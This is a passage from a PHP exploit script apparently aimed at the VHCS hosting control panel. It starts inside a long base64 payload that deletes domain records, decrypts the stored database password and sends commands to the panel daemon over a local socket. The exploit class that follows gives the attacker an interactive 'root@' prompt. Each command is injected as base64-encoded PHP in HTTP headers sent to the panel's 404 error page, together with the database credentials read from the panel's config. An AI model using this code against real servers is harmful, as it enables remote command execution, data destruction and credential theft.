.'xFVEUgRlJPTSBkb21haW4gV0hFUkUgZG9tYWluX25hbWUgTElL' .'RSAiLgoiJyUkZmlsZSUnIjsKCmV4ZWNfc3FsKCRkZWwpOwoKZn' .'VuY3Rpb24gZXhlY19zcWwoJHNxbF9hcnIpCnsKCWZvcmVhY2go' .'JHNxbF9hcnIgYXMgJHNxbF9xKQoJICAgbXlzcWxfcXVlcnkoJH' .'NxbF9xKSB8fCBkaWUobXlzcWxfZXJyb3IoKSk7CgoJcmV0dXJu' .'Owp9CgovLyB2aGNzCmZ1bmN0aW9uIGRlY3J5cHRfZGJfcGFzc3' .'dvcmQgKCRkYl9wYXNzKSB7CgogICAgIGdsb2JhbCAkdmhjczJf' .'ZGJfcGFzc19rZXk7CiAgICAgZ2xvYmFsICR2aGNzMl9kYl9wYX' .'NzX2l2OwogICAgICAgICAgIAogICAgJHRleHQgPSBiYXNlNjRf' .'ZGVjb2RlKCIkZGJfcGFzc1xuIik7CiAgICAKICAgIC8qIE9wZW' .'4gdGhlIGNpcGhlciAqLwogICAgJHRkID0gbWNyeXB0X21vZHVs' .'ZV9vcGVuICgnYmxvd2Zpc2gnLCAnJywgJ2NiYycsICcnKTsKIC' .'AgIAogICAgLyogQ3JlYXRlIGtleSAqLwogICAgICAgICRrZXkg' .'PSAkdmhjczJfZGJfcGFzc19rZXk7CiAgICAKICAgIC8qIENyZW' .'F0ZSB0aGUgSVYgYW5kIGRldGVybWluZSB0aGUga2V5c2l6ZSBs' .'ZW5ndGggKi8KICAgICAgICAkaXYgPSAkdmhjczJfZGJfcGFzc1' .'9pdjsKICAgICAgCiAgICAvKiBJbnRpYWxpemUgZW5jcnlwdGlv' .'biAqLyAgICAgICAgICAgICAgICAgICAgCiAgICBtY3J5cHRfZ2' .'VuZXJpY19pbml0ICgkdGQsICRrZXksICRpdik7CiAgICAgICAg' .'ICAgICAgICAgICAgICAKICAgIC8qIERlY3J5cHQgZW5jcnlwdG' .'VkIHN0cmluZyAqLyAgICAKICAgICRkZWNyeXB0ZWQgPSBtZGVj' .'cnlwdF9nZW5lcmljICgkdGQsICR0ZXh0KTsKICAgICAgICAgIC' .'AgICAgICAgICAgICAgICAKICAgIG1jcnlwdF9tb2R1bGVfY2xv' .'c2UgKCR0ZCk7CiAgICAgICAgICAgICAgICAgICAgICAgICAgIC' .'AgICAgCiAgICAvKiBTaG93IHN0cmluZyAqLyAgICAgICAgICAg' .'ICAgICAgICAgICAgICAgICAgICAgICAKICAgIHJldHVybiB0cm' .'ltKCRkZWNyeXB0ZWQpOwp9CgovLyB2aGNzCmZ1bmN0aW9uIHNl' .'bmRfcmVxdWVzdCgpIHsKCiAgICBnbG9iYWwgJFZlcnNpb24sIC' .'RWZXJzaW9uSCwgJEJ1aWxkRGF0ZTsKCiAgICBAJHNvY2tldCA9' .'IHNvY2tldF9jcmVhdGUgKEFGX0lORVQsIFNPQ0tfU1RSRUFNLC' .'AwKTsKCiAgICBpZiAoJHNvY2tldCA8IDApIHsKICAgICAgICAk' .'ZXJybm8gPSAgInNvY2tldF9jcmVhdGUoKSBmYWlsZWQuXG4iOw' .'ogICAgICAgIHJldHVybiAkZXJybm87CiAgICB9CgogICAgQCRy' .'ZXN1bHQgPSBzb2NrZXRfY29ubmVjdCAoJHNvY2tldCwgIjEyNy' .'4wLjAuMSIsIDk4NzYpOwogICAgaWYgKCRyZXN1bHQgPT0gRkFM' .'U0UpIHsKICAgICAgICAkZXJybm8gPSAgInNvY2tldF9jb25uZW' .'N0KCkgZmFpbGVkLlxuIjsKICAgICAgICByZXR1cm4gJGVycm5v' .'OwogICAgfQoKICAgIC8qIHJlYWQgb25lIGxpbmUgd2l0aCB3ZW' .'xjb21lIHN0cmluZyAqLwogICAgJG91dCA9IHJlYWRfbGluZSgk' .'c29ja2V0KTsKCiAgICAvKiBzZW5kIGhlbGxvIHF1ZXJ5ICovCi' .'AgICAkcXVlcnkgPSAiaGVsbyAgJFZlcnNpb25cclxuIjsKICAg' .'IHNvY2tldF93cml0ZSAoJHNvY2tldCwgJHF1ZXJ5LCBzdHJsZW' .'4gKCRxdWVyeSkpOwoKICAgIC8qIHJlYWQgb25lIGxpbmUgd2l0' .'aCBoZWxvIGFuc3dlciAqLwogICAgJG91dCA9IHJlYWRfbGluZS' .'gkc29ja2V0KTsKCiAgICAvKiBzZW5kIHJlZyBjaGVjayBxdWVy' .'eSAqLwogICAgJHF1ZXJ5ID0gImV4ZWN1dGUgcXVlcnlcclxuIj' .'sKICAgIHNvY2tldF93cml0ZSAoJHNvY2tldCwgJHF1ZXJ5LCBz' .'dHJsZW4gKCRxdWVyeSkpOwogICAgLyogcmVhZCBvbmUgbGluZS' .'BrZXkgcmVwbGF5ICovCiAgICAkZXhlY3V0ZV9yZXBsYXkgPSBy' .'ZWFkX2xpbmUoJHNvY2tldCk7CgogICAgLyogc2VuZCBxdWl0IH' .'F1ZXJ5ICovCiAgICAkcXVpdF9xdWVyeSA9ICJieWVcclxuIjsK' .'ICAgIHNvY2tldF93cml0ZSAoJHNvY2tldCwgJHF1aXRfcXVlcn' .'ksIHN0cmxlbiAoJHF1aXRfcXVlcnkpKTsKICAgIC8qIHJlYWQg' .'cXVpdCBhbnN3ZXIgKi8KICAgICRxdWl0X3JlcGxheSA9IHJlYW' .'RfbGluZSgkc29ja2V0KTsKCiAgICAvKiBhbmFseXplIGtleSBy' .'ZXBsYXkgKi8KICAgICRhbnN3ZXIgPSAkZXhlY3V0ZV9yZXBsYX' .'k7CgogICAgLyogY2xvc2Ugc29ja2V0ICovCiAgICBzb2NrZXRf' .'Y2xvc2UgKCRzb2NrZXQpOwoKICAgIC8qIHJldHVybiBmdW5jdG' .'lvbiByZXN1bHQgKi8KICAgIHJldHVybiAkYW5zd2VyOwoKfQoK' .'Ly8gdmhjcwpmdW5jdGlvbiByZWFkX2xpbmUoJHNvY2tldCkgew' .'0KICAgICRjaCA9ICcnOw0KICAgICRsaW5lID0gJyc7DQogICAg' .'ZG97DQogICAgICAgICRjaCA9IHNvY2tldF9yZWFkKCRzb2NrZX' .'QsMSk7DQogICAgICAgICRsaW5lID0gJGxpbmUgLiAkY2g7DQog' .'ICAgfSB3aGlsZSgkY2ggIT0gIlxyIik7DQogICAgcmV0dXJuIC' .'RsaW5lOw0KfQo/Pgo=';
while($this->cmd_prompt()) { $this->exec_php('print $_SERVER["DOCUMENT_ROOT"];'); $this->tmp_file = $this->getcontent().'/'.md5(rand());
$this->set_hvar('db-host', $this->conf['DATABASE_HOST']); $this->set_hvar('db-user', $this->conf['DATABASE_USER']); $this->set_hvar('db-pass', $this->conf['DATABASE_PASSWORD']); $this->set_hvar('db-name', $this->conf['DATABASE_NAME']);
$this->set_hvar('sleep-time', $this->sleep_time); $this->set_hvar('file', $this->tmp_file); $this->set_hvar('cmd', $this->cmd); $this->set_hvar('version', $this->conf['Version']); $this->set_hvar('php-keys', '?>'.$this->php_keys_code);
print "\n".$this->getcontent(); }
exit(0); }
function set_hvar($name, $value) { $this->addheader('Sploit-'.$name, base64_encode($value));
return; }
function cmd_prompt() { $this->msg('root@'.$this->usr.': ', 1); $this->cmd = trim(fgets(STDIN));
if(!ereg('^(quit|exit)$', $this->cmd)) return TRUE;
else return FALSE; }
function exec_php($php) { $this->addheader('Shell', base64_encode($php)); $this->get($this->dmn_url.'/errors/404/index.php');
return; }
function msg($msg, $flag, $action=0) { print "\n ".$this->flags[$flag]."\x20".$msg;
switch($action) { case 1: print "\n"; return $this->usage(); break;
case 2: print "\n"; exit(1); break; } } }
$spl = new vhcs_xpl; $spl->main();
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